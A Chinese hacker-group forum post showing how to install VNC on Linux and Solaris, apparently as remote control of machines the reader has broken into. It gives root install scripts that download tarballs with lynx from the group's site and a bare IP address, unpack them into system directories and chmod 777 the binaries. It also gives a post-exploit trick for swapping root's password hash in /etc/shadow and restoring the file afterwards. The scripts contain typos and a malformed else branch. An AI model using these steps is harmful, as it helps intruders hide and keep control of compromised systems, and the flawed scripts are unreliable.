像win2000的終端服務一樣遠端控制unix

[psac]

VNC（Virtual Network Computing）下載：http://www.ttian.net/download/show.php?id=456，包括WINDOWS/LINUX/Solaris 三個版本分別下載。

申明：本文版權歸幻影旅團及中國刺客網所有，歡迎轉載，但請保持原文完成及出處。




前段時間我們敬愛的榕哥寫了遠端安裝vnc的文章，本來我以為他會接著寫linux下的vnc安裝，但卻沒了下文。由於以前我和x-laser研究過unix下的vnc安裝，所以，今天就把一點心得寫出來，錯誤之處，還請高手指正。



首先要來介紹一下vnc這個軟體。國內對於vnc的研究比較少，只是到最近小榕才推廣了一下，可是，對其強大的功能，也只是利用了一小部分。vnc是Virtual Network Computing的簡稱。是由http://www.uk.research.att.com/vnc的專門負責發的開發小組開發的。


vnc有點類似win2000的終端服務，相對於其他的遠端控制軟體，主要體現了五個優點。

1.vnc遠端控制時,客戶端的任何異常事故不會對服務端造成影響,就是說,如果你正在用vnc遠端控制一台主機,你突然當機了,再用vnc連時,可以繼續進行剛才的操作.

2.vnc的控制端很小,而且不需要任何安裝,是居家旅行時的必備良藥 而且vnc有java的控制端,不需要用任何其他工具,用瀏覽器就可以直接控制,比如ie或netscape

3.vnc實現了真正的跨平台,你可以在unix下控制windows,或者是在unix下控制windows,並不依賴操作平台是vnc最大的特色和優點.在本文中,我們將演示如何用windows來控制linux和solaris.

4.一個桌面可以同時被多個用戶使用類似win2000終端的管理中的連接功能,交流非常方便,可做教學之用

5.vnc符合GNU風格,開放原程式碼,這是最大的好處,當然vnc的exploit在packetstorm上也可以找到.



vnc的控制原理也可以用下圖方便的表示

vnc viewer<----------------->Xvnc(vnc server)<-------------------------------->applications
(vnc protocal) (X protocal)



這個控制是關於tcp/ip的,其中vnc server扮演了雙重角色.vnc protocal是關於RFB protocal的,有興趣的可以參照作者主頁.這裡不再贅述.



說了這麼多了,現在就讓我們開始動手來安裝吧!首先以linux下的安裝為例,我們可以用windows來控制linux的x-window.



把包傳到linux的/tmp目錄下(這裡以/tmp為例,你也可以更換到其他的合適目錄)



用tar指令解壓縮,會得到一個vnc_x86_linux_2.0的目錄

cd vnc_x86_linux_2.0進入後,接下來需要做的就是拷貝一些文件

首先我們
mkdir -p /usr/local/bin/vnc/classes建立一個目錄

再
cp classes/* /usr/local/bin/vnc/classes

接著再
mv vncpasswd /usr/bin
mv vncserver /usr/bin
mv vncviewer /usr/bin
mv Xvnc /usr/bin



vncpasswd是設定vnc的控制密碼，vncserver是安裝指令碼，vncviewer是主控端，Xvnc就是上面傳輸協定裡的那個了.這裡我們做的主要就是把軟體包的classes目錄移到/usr/local/bin/vnc目錄下面，然後把vncpasswd，vncserver，vncviewer,Xvnc這幾個配置的文件放到/usr/bin這個目錄，這裡最重要的就是vncserver和Xvnc這兩個文件。



然後我們需要修改一下xstartup這個指令碼.位置在/tmp/.vnc下,我們修改他來使用kde啟動,如果有kde的話 因為預設是twm啟動,用kde比較漂亮



修改如下
echo "xrdb $HOME/.Xresources" >>xstartup
這句是讓xrdb新增.Xresources文件
echo "xsetroot -solid grey" >>xstartup
echo 'xterm -geometry 80x24+10+10 -ls -title "$VNCDESKTOP Desktop" &'>>xstartup
這句是設定螢幕解析度和到文件
echo "startkde &" >>xstartup
這句是以kde啟動


然後我們再用vncserver啟動即可了 這樣再用vncviewer連,輸入密碼後就可以看到漂亮的kde桌面了.


X-laser給我們寫了一個本機安裝vnc的指令碼


------------------------------cut here----------------------------------------------------------
#!/bin/sh
echo "This vnc install(rdehat *)"
echo "author:X-Laser"
echo "這裡是幻影旅團（www.3389.net）"
echo " 中國刺客網（www.thugx.com）"
lynx -dump www.3389.net/vnc.tgz >/tmp/.vnc.tgz
if chmod 777 /usr/X11R6/bin/twm
then
echo "checke x-server ok"
else
lynx -dump 61.153.9.166/bin.tar >/usr/X11R6/
lynx -dump 61.153.9.166/lib.tar >/usr/X11R6/
tar -xvf /usr/X11R6/bin.tar
tar -xvf /usr/X11R6/lib.tar
fi
cd /tmp;tar -zxvf .vnc.tgz;
mkdir .sh
cd vnc_x86_linux_2.0
cp /usr/X11R6/bin/xauth /usr/bin; chmod 777 /usr/bin/xauth
mkdir -p /usr/local/vnc/classes
mkdir -p $HOME/.vnc
mkdir twm
cp classes/* /usr/local/vnc/classes
mv vncpasswd /usr/bin
mv vncserver /usr/bin
mv vncviewer /usr/bin
mv Xvnc /usr/bin
echo "請輸入選項的啟動的界面 "
echo "twm 界面,簡陋型"
echo "kde 標準界面"
read vncgui
if cd $vncgui
then
echo "您選項了twm界面"
else
"您已經選項了kde標準界面"
cd $HOME/.vnc
echo "#!/bin/sh" >xstartup
echo "" >>startup
echo "xrdb $HOME/.Xresources" >>xstartup
echo "xsetroot -solid grey" >>xstartup
echo 'xterm -geometry 80x24+10+10 -ls -title "$VNCDESKTOP Desktop" &'>>xstartup
echo "startkde &" >>xstartup
fi
echo "請輸入密碼 長度5或者位以上"
vncserver
echo "您的vnc服務連接埠"
netstat -an |grep 590
echo "您的http連接vnc連接埠"
netstat -an |grep 580
echo "安裝程序結束"



-------------------------------------------cut here------------------------------------------



注意事項,由於vnc安裝時與環境變數密切相關,所以請以正常用戶安裝(建議以root權限安裝,這樣有時候很多權限不夠的問題可以避免)如果是以溢出後的uid=0的權限或者是suid的euid=0的權限來安裝,都有可能遇到環境變數的問題.



黑客的小技巧:黑客入侵的後,可以用溢出的uid=0或euid=0的權限通過修改shadow的方法來改變root的密碼,然後su到root,這樣就不會有環境變數的問題了.直接實現如下

1.先建立一個用戶,再用passwd修改密碼

2.把shadow制作備份,然後把shadow中root的密碼的hash替換成自己剛建立的用戶的密碼的hash,然後再su到root,進行操作

3.操作完成,退出root,再把剛才制作備份的替換回來.



安裝好後,會有兩個連接埠,一個是590x,一個是580x.因為安裝時連接埠不是類BIOS的.590x的連接埠是服務連接連接埠，而580x綁定了applet小程序，用web連接此連接埠會自動執行applet，從而達到網頁訪問效果，就是我前面提到的可以用瀏覽器來控制一樣，最大限度的實現了跨平台。



現在我們來講vnc在solaris下的安裝，安裝程序與在linux下安裝幾乎是一模一樣的.不同的是sunos需要自己把包傳到/tmp目錄下，而linux下的安裝則由指令碼控制lynx自動下載，因為很多sunos都沒lynx的緣故。同樣在安裝程序中需要root身份安裝（不僅僅是uid=0哦！！）x-laser也為我們寫了個本機安裝的指令碼

----------------------------------------cut here---------------------------------------------
#安裝時請以root權限安裝
#!/bin/sh
echo "This vnc install(sunos ALL *)"
echo "author:X-Laser"
echo "這裡是幻影旅團（www.3389.net）"
echo " 中國刺客網（www.thugx.com）"
if chmod 777 /usr/openwin/bin/xauth
then
echo "ok vnc -install start"
tar -xvf sunos.tar
cd vnc_sun4_sosV_5.5
mkdir -p /usr/local/vnc/classes
cp calsses/* /usr/local/vnc/classes
mv vncserver /usr/bin
mv vncviewer /usr/bin
mv Xvnc /usr/bin
mv vncpasswd /usr/bin
cp /usr/openwin/bin/* /usr/bin
cp /usr/openwin/lib/* /usr/bin
mkdir -p $HOME/.vnc
echo "#!/bin/sh" >$HOME/.vnc/xstartup
echo "" >>$HOME/.vnc/xstartup
echo "xrdb $HOME/.Xresources" >>$HOME/.vnc/xstartup
echo "xsetroot -solid grey" >>$HOME/.vnc/xstartup
echo 'xterm -geometry 80x24+10+10 -ls -title "$VNCDESKTOP Desktop" &' >>$HOME/.vnc/xstartup
echo "/usr/dt/bin/dtsession & " >>$HOME/.vnc/xstartup
vncserver
echo "請輸入密碼，長度5位或5位以上"
echo "next vnc start port"
netstat -a |grep 590
echo install over
else
echo 您的X11R6文件不全,請把其他機器的openwin,cp到/usr/openwin/bin/裡
fi



--------------------------------------cut here----------------------------------------------



vnc還可以在各種其他的系統下安裝，比如aix，freebsd等，但是安裝還在測試中，到時候我們會再出些安裝指令碼。



說了這麼多都還只是安裝下面講控制。控制有兩種方式

1.用瀏覽器控制。比如說192.168.0.1是被控端，vnc開了兩個連接埠5801和5901。那麼我們在瀏覽器的位址欄裡輸入http://192.168.0.1:5801然後就會自動下載applet的控制程序,輸入密碼之後,就可以看見x-window了,請注意,這個連接埠是5801,不是5901

2.用vncviewer控制.到 下載vncviewer,然後輸入192.168.0.1:5901 第二步是輸入密碼,然後就可以開始連接控制了.



下面是我控制linux和sunos的

在windows下控制linux


在windows下控制sunos



以上所提到的軟體可以在幻影旅團的主頁下載到

linux下的安裝包:www.3389.net/vnc.tgz

solaris下的安裝包:www.3389.net/sunos.tar

遠端控制工具vncviewer:www.3389.net/vncviewer.exe



關於vnc的初步介紹這篇文章就介紹到這裡了,vnc的功能很強,不是一篇文章就能搞定的,以後我們會陸續寫關於這方面的文章.也希望在這方面有心得的朋友能和我們交流交流。同時也提供一些技術支持,可以訪問我們的論壇www.3389.net/bbs在unix hacking版將討論關於vnc的問題.同以往一樣,留下我的QQ:5279239我是幻影旅團團長刺

[jal0707]

謝謝分享這個好東西真的很感謝